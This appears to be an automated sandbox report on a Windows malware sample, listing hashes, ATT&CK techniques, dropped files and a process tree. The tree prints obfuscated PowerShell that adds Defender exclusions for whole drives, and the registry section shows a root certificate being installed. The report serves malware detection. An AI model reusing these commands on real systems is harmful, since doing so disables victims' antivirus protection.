aa2bc6bdab3c1cd9cc94e92a00f2501ffd6bef384e69e605b9533ee4a9af2fcc

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25/12/2024, 12:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Court Project V1.1/AIO.exe
Size

17.7MB
MD5

401a1cbd5e2b10c3e4f167dc1f7bb4f1
SHA1

ad74dfb0cb89794f0f13a21f35644ad51eab6ba7
SHA256

22e7c140c849ad87f0d9f9624374045712c8a2f4c38befa85a92330fe2382316
SHA512

df58e49d75dfe0b46057486d1117c422ff77d4b64d5bf4a14e0b9772600091b19d743793fdd7fc2e3031dc72cb6f50e0f1077cae3040a1dec9f5fe8df3464e8d
SSDEEP

393216:kMr/sMzD1BTFAj8ItCGsm37tPIHHlWlf3TD:kWk0pBTFADzOnlM

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2812	Dox Tool V2.exe
580	IS.Setup.exe

Loads dropped DLL 9 IoCs

pid	Process
2956	AIO.exe
2956	AIO.exe
2956	AIO.exe
580	IS.Setup.exe
580	IS.Setup.exe
1360	MsiExec.exe
1360	MsiExec.exe
1360	MsiExec.exe
1360	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	IS.Setup.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	IS.Setup.exe
File opened (read-only)	\??\U:	IS.Setup.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	IS.Setup.exe
File opened (read-only)	\??\R:	IS.Setup.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	IS.Setup.exe
File opened (read-only)	\??\G:	IS.Setup.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	IS.Setup.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	IS.Setup.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	IS.Setup.exe
File opened (read-only)	\??\M:	IS.Setup.exe
File opened (read-only)	\??\K:	IS.Setup.exe
File opened (read-only)	\??\Z:	IS.Setup.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	IS.Setup.exe
File opened (read-only)	\??\J:	IS.Setup.exe
File opened (read-only)	\??\N:	IS.Setup.exe
File opened (read-only)	\??\V:	IS.Setup.exe
File opened (read-only)	\??\P:	IS.Setup.exe
File opened (read-only)	\??\Q:	IS.Setup.exe
File opened (read-only)	\??\Y:	IS.Setup.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	IS.Setup.exe
File opened (read-only)	\??\O:	IS.Setup.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\T:	IS.Setup.exe
File opened (read-only)	\??\W:	msiexec.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AIO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dox Tool V2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IS.Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
608	powershell.exe
932	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	608	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeRestorePrivilege	2468	msiexec.exe
Token: SeTakeOwnershipPrivilege	2468	msiexec.exe
Token: SeSecurityPrivilege	2468	msiexec.exe
Token: SeCreateTokenPrivilege	580	IS.Setup.exe
Token: SeAssignPrimaryTokenPrivilege	580	IS.Setup.exe
Token: SeLockMemoryPrivilege	580	IS.Setup.exe
Token: SeIncreaseQuotaPrivilege	580	IS.Setup.exe
Token: SeMachineAccountPrivilege	580	IS.Setup.exe
Token: SeTcbPrivilege	580	IS.Setup.exe
Token: SeSecurityPrivilege	580	IS.Setup.exe
Token: SeTakeOwnershipPrivilege	580	IS.Setup.exe
Token: SeLoadDriverPrivilege	580	IS.Setup.exe
Token: SeSystemProfilePrivilege	580	IS.Setup.exe
Token: SeSystemtimePrivilege	580	IS.Setup.exe
Token: SeProfSingleProcessPrivilege	580	IS.Setup.exe
Token: SeIncBasePriorityPrivilege	580	IS.Setup.exe
Token: SeCreatePagefilePrivilege	580	IS.Setup.exe
Token: SeCreatePermanentPrivilege	580	IS.Setup.exe
Token: SeBackupPrivilege	580	IS.Setup.exe
Token: SeRestorePrivilege	580	IS.Setup.exe
Token: SeShutdownPrivilege	580	IS.Setup.exe
Token: SeDebugPrivilege	580	IS.Setup.exe
Token: SeAuditPrivilege	580	IS.Setup.exe
Token: SeSystemEnvironmentPrivilege	580	IS.Setup.exe
Token: SeChangeNotifyPrivilege	580	IS.Setup.exe
Token: SeRemoteShutdownPrivilege	580	IS.Setup.exe
Token: SeUndockPrivilege	580	IS.Setup.exe
Token: SeSyncAgentPrivilege	580	IS.Setup.exe
Token: SeEnableDelegationPrivilege	580	IS.Setup.exe
Token: SeManageVolumePrivilege	580	IS.Setup.exe
Token: SeImpersonatePrivilege	580	IS.Setup.exe
Token: SeCreateGlobalPrivilege	580	IS.Setup.exe
Token: SeCreateTokenPrivilege	580	IS.Setup.exe
Token: SeAssignPrimaryTokenPrivilege	580	IS.Setup.exe
Token: SeLockMemoryPrivilege	580	IS.Setup.exe
Token: SeIncreaseQuotaPrivilege	580	IS.Setup.exe
Token: SeMachineAccountPrivilege	580	IS.Setup.exe
Token: SeTcbPrivilege	580	IS.Setup.exe
Token: SeSecurityPrivilege	580	IS.Setup.exe
Token: SeTakeOwnershipPrivilege	580	IS.Setup.exe
Token: SeLoadDriverPrivilege	580	IS.Setup.exe
Token: SeSystemProfilePrivilege	580	IS.Setup.exe
Token: SeSystemtimePrivilege	580	IS.Setup.exe
Token: SeProfSingleProcessPrivilege	580	IS.Setup.exe
Token: SeIncBasePriorityPrivilege	580	IS.Setup.exe
Token: SeCreatePagefilePrivilege	580	IS.Setup.exe
Token: SeCreatePermanentPrivilege	580	IS.Setup.exe
Token: SeBackupPrivilege	580	IS.Setup.exe
Token: SeRestorePrivilege	580	IS.Setup.exe
Token: SeShutdownPrivilege	580	IS.Setup.exe
Token: SeDebugPrivilege	580	IS.Setup.exe
Token: SeAuditPrivilege	580	IS.Setup.exe
Token: SeSystemEnvironmentPrivilege	580	IS.Setup.exe
Token: SeChangeNotifyPrivilege	580	IS.Setup.exe
Token: SeRemoteShutdownPrivilege	580	IS.Setup.exe
Token: SeUndockPrivilege	580	IS.Setup.exe
Token: SeSyncAgentPrivilege	580	IS.Setup.exe
Token: SeEnableDelegationPrivilege	580	IS.Setup.exe
Token: SeManageVolumePrivilege	580	IS.Setup.exe
Token: SeImpersonatePrivilege	580	IS.Setup.exe
Token: SeCreateGlobalPrivilege	580	IS.Setup.exe
Token: SeCreateTokenPrivilege	580	IS.Setup.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
580	IS.Setup.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 608	2956	AIO.exe	31
PID 2956 wrote to memory of 608	2956	AIO.exe	31
PID 2956 wrote to memory of 608	2956	AIO.exe	31
PID 2956 wrote to memory of 608	2956	AIO.exe	31
PID 2956 wrote to memory of 932	2956	AIO.exe	33
PID 2956 wrote to memory of 932	2956	AIO.exe	33
PID 2956 wrote to memory of 932	2956	AIO.exe	33
PID 2956 wrote to memory of 932	2956	AIO.exe	33
PID 2956 wrote to memory of 2812	2956	AIO.exe	35
PID 2956 wrote to memory of 2812	2956	AIO.exe	35
PID 2956 wrote to memory of 2812	2956	AIO.exe	35
PID 2956 wrote to memory of 2812	2956	AIO.exe	35
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2956 wrote to memory of 580	2956	AIO.exe	36
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38
PID 2468 wrote to memory of 1360	2468	msiexec.exe	38

C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe
"C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcgBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAZQB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBmACAAbgBvAHQAIABlAHYAZQByAHkAdABoAGkAbgBnACAAVwBvAHIAawBzACAAUAByAG8AcABlAHIAbAB5ACAASQBuAHMAdABhAGwAbAAgAFAAeQB0AGgAbwBuACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBwAHQAdAAjAD4A"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZQB5ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe
  "C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:580

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B1D763C017D015A7FC4E5900D9A4564D C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\PrepareDlgProgress.gif

Filesize
24KB

MD5
f550f449baed1315c7965bd826c2510b

SHA1
772e6e82765dcfda319a68380981d77b83a3ab1b

SHA256
0ee7650c7faf97126ddbc7d21812e093af4f2317f3edcff16d2d6137d3c0544d

SHA512
7608140bc2d83f509a2afdaacd394d0aa5a6f7816e96c11f4218e815c3aaabf9fc95dd3b3a44b165334772ebdab7dfa585833850db09442743e56b8e505f6a09

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\backgroundprepare

Filesize
134B

MD5
a0efb0e7b9cee25b09e09a1a64e96ba6

SHA1
0c1e18f6f5e6e5e6953e9fb99ca60fdec35d6e39

SHA256
f044f542bc46464054084c63596877f06c6e2c215c0e954c4ace9787ced82787

SHA512
7e53f9f564aaa529b3b15035671957c2923ec98ddee93758ea7a4c8645ee9058962078771b853e3490290fde1f57030dff5092d40d69418776ffee89f79c8a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\checkbox

Filesize
1KB

MD5
0b044ccde7aa9d86e02a94030d744ac2

SHA1
0594ebb3737536703907ba5672ccd351c6afb98a

SHA256
bce5b6de3a1c7af7ec14b6643da25f7c9e15bd5f1c4a38abfcddc70a5e93bdd3

SHA512
dbfba793722589f1a76dbc75c9a2f3646733e4a079a6b70003716a7f7b8fa1a6a2b234ec9132f5737e91d20d460db1e29826b2d7ac740f73136975f19e336cd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_bottom_left.bmp

Filesize
66B

MD5
1fb3755fe9676fca35b8d3c6a8e80b45

SHA1
7c60375472c2757650afbe045c1c97059ca66884

SHA256
384ebd5800becadf3bd9014686e6cc09344f75ce426e966d788eb5473b28aa21

SHA512
dee9db50320a27de65581c20d9e6cf429921ebee9d4e1190c044cc6063d217ca89f5667dc0d93faf7dcc2d931fe4e85c025c6f71c1651cbd2d12a43f915932c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_bottom_mid.bmp

Filesize
66B

MD5
71fa2730c42ae45c8b373053cc504731

SHA1
ef523fc56f6566fbc41c7d51d29943e6be976d5e

SHA256
205209facdebf400319dbcb1020f0545d7564b9415c47497528593e344795afd

SHA512
ea4415619720cc1d9fb1bb89a14903bfd1471b89f9c4847df4839084aae573d49b4969d3799ad30ff25b71f6e31f8d9f30701e1240d3cd6a063819c04873f21f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_caption.bmp

Filesize
206B

MD5
8641f45594b8d413bf1da25ce59f1207

SHA1
afebb23f5a55d304d028ca9942526b3649cddb52

SHA256
0403ed31d75dcc182dd98f2b603da4c36b6325e9d159cac4371e1448244bb707

SHA512
86a5f959f8462f866466dc706d3ae627b1fb019b8a33ee7fe48e3b69f92bf33dc0f1417c0d5116552b25b488bcb5d9050a33773e6883ebe08410267d95b2353a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_left.bmp

Filesize
66B

MD5
30384472ae83ff8a7336b987292d8349

SHA1
85d3e6cffe47f5a0a4e1a87ac9da729537783cd0

SHA256
f545ec56bc9b690a6b952471669a8316e18274d64e2ebc9e365fcf44363a125a

SHA512
7611f930a0a1089cc5004203ec128c916f0c2aedae3a6fcc2eaffa8cd004dcbf154714e401947921a06896ca77c77daec7f9bda82369aacd3bb666f8a0331963

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_left_inactive.bmp

Filesize
66B

MD5
4b84f29fbce81aab5af97a311d0e51e2

SHA1
60723cf4b91c139661db5ecb0964deca1fc196ea

SHA256
c93be5a7c979c534274fc1a965d26c126efa5d58c14066b14937e5aba3b9eb55

SHA512
775eadccc44fddbd1e0d4231bc90d222f0a9749199e1963449ad20285ea92941a5685cdc12c0cd8c0ef0a21e10bdacaf139e5c69cd5e402cc110679323c23df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_top_left.bmp

Filesize
154B

MD5
1966f4308086a013b8837dddf88f67ad

SHA1
1b66c1b1ad519cad2a273e2e5b2cfd77b8e3a190

SHA256
17b5cd496d98db14e7c9757e38892883c7b378407e1f136889a9921abe040741

SHA512
ec50f92b77bca5117a9a262ba1951e37d6139b838099e1546ab2716c7bafb0fc542ce7f1993a19591c832384df01b722d87bb5a6a010091fc880de6e5cfa6c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\frame_top_mid.bmp

Filesize
66B

MD5
4e0ac65606b6aacd85e11c470ceb4e54

SHA1
3f321e3bbde641b7733b806b9ef262243fb8af3b

SHA256
1d59fe11b3f1951c104f279c1338fc307940268971d016ebe929a9998a5038ee

SHA512
7b28bcb4e76af3b863a7c3390b6cd3316c4631434e1d1e2df8d6e0eb9987a61a4f1a24de59567394e346d45e332403a0817ed0b0b64d7a624dbe48e30db9bb64

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\iconnnn.jpg

Filesize
60KB

MD5
4938b81c37711b169c3416f312939df3

SHA1
0fa44cb363ee08e0850d6bbc7aaa7164a0f9050c

SHA256
cd60622e290ff56e44e29d7ddc005dcefa70a7efda24a7e0075587d5039ad710

SHA512
fd69aadc8502ac3ace5f937b7b7f38bf70cc1b89baaf9826713d5061f993cd593683227d5110e040fddd5d02fa3a993c6d128949025ce85cb61978cc3b40484d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\metrobuttonimage

Filesize
404B

MD5
17368ff7073a6c7c2949d9a8eb743729

SHA1
d770cd409cf1a95908d26a51be8c646cace83e4c

SHA256
16e6e7662f3a204061c18090a64a8679f10bc408be802abd2c7c0e9fe865cbb4

SHA512
cbc3a378335f131d0146e5fe40cea38a741a0754a26304daebfda6f82c394cf0e151654782c6c8c7bbf7c354fcb72a2c66a77a87df528c2a3fa87c88f204059d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_580\sys_close_normal.png

Filesize
225B

MD5
8ba33e929eb0c016036968b6f137c5fa

SHA1
b563d786bddd6f1c30924da25b71891696346e15

SHA256
bbcac1632131b21d40c80ff9e14156d36366d2e7bb05eed584e9d448497152d5

SHA512
ba3a70757bd0db308e689a56e2f359c4356c5a7dd9e2831f4162ea04381d4bbdbef6335d97a2c55f588c7172e1c2ebf7a3bd481d30871f05e61eea17246a958e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD348.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
